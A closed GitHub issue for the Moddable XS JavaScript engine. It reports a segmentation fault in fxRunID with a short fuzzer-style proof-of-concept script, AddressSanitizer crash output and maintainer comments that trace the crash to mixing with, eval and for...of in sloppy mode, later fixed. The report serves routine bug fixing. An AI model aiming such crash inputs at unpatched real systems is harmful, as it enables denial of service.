Moddable-OpenSource/moddable #788: SEGV xsRun.c:4140 in fxRunID

jessysaurusrex, 2022-01-24:
### Version: 
[eecb298fb1d9019854591515664e369ad9cf5b53](https://github.com/Moddable-OpenSource/moddable/tree/eecb298fb1d9019854591515664e369ad9cf5b53)

### poc.js
```js
function main() {
for (const v1 of "9ZQ9HPSlRT") {
    const v3 = new Int32Array();
    with (v3) {
    }
    continue;
}
const v5 = eval();
const v8 = new Int32Array(709365.1135174017);
const v9 = `undefined${v8}function`;
}
main();
```

### Invocation `xst poc.js`
```
STDERR: 
/Users/amulet/moddable/xs/sources/xsScript.c:203:16: runtime error: left shift of 1327365517 by 1 places cannot be represented in type 'txSize' (aka 'int')
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /Users/amulet/moddable/xs/sources/xsScript.c:203:16 in 
/Users/amulet/moddable/xs/sources/xsDataView.c:1439:42: runtime error: left shift of 3 by 30 places cannot be represented in type 'int'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /Users/amulet/moddable/xs/sources/xsDataView.c:1439:42 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==90797==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000019 (pc 0x0001015551a8 bp 0x00010144f640 sp 0x00016ee854a0 T0)
==90797==The signal is caused by a UNKNOWN memory access.
==90797==Hint: address points to the zero page.
    #0 0x1015551a8 in fxRunID xsRun.c:4140

==90797==Register values:
 x[0] = 0x0000000000000019   x[1] = 0x000000010880b040   x[2] = 0x0000000000000000   x[3] = 0x00000001088332a0  
 x[4] = 0xffffffffffea59d8   x[5] = 0x0000000000000020   x[6] = 0x0000000000000000   x[7] = 0x0000000000000001  
 x[8] = 0x0000000000000019   x[9] = 0x0000007000020000  x[10] = 0x0000000101555660  x[11] = 0x00000000000000e8  
x[12] = 0x000000016ee9fcc8  x[13] = 0x000000016ee89ac0  x[14] = 0x0000000000005694  x[15] = 0x00000000db99d9d1  
x[16] = 0x00000001c41ec110  x[17] = 0x000000010248c5b8  x[18] = 0x0000000000000000  x[19] = 0x0000000101cc4060  
x[20] = 0x00000001017c6a58  x[21] = 0x00000001020b4070  x[22] = 0x0000000000000000  x[23] = 0x0000000000000000  
x[24] = 0x0000000000000000  x[25] = 0x0000000000000000  x[26] = 0x0000000000000000  x[27] = 0x0000000000000000  
x[28] = 0x0000000000000000     fp = 0x000000016eeb47f0     lr = 0x000000010144f640     sp = 0x000000016ee854a0  
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV xsRun.c:4140 in fxRunID
==90797==ABORTING

Status: 
pid 90797 SIGABRT (signal 6)
```

phoddie, 2022-01-25:
Sloppy mode only.

phoddie, 2022-01-25:
Mixing `with`, `eval` and `for...of` confused the environment.

jessysaurusrex, 2022-02-02:
Verified fixed in `fb7b2c2`

closed 2022-02-02 by jessysaurusrex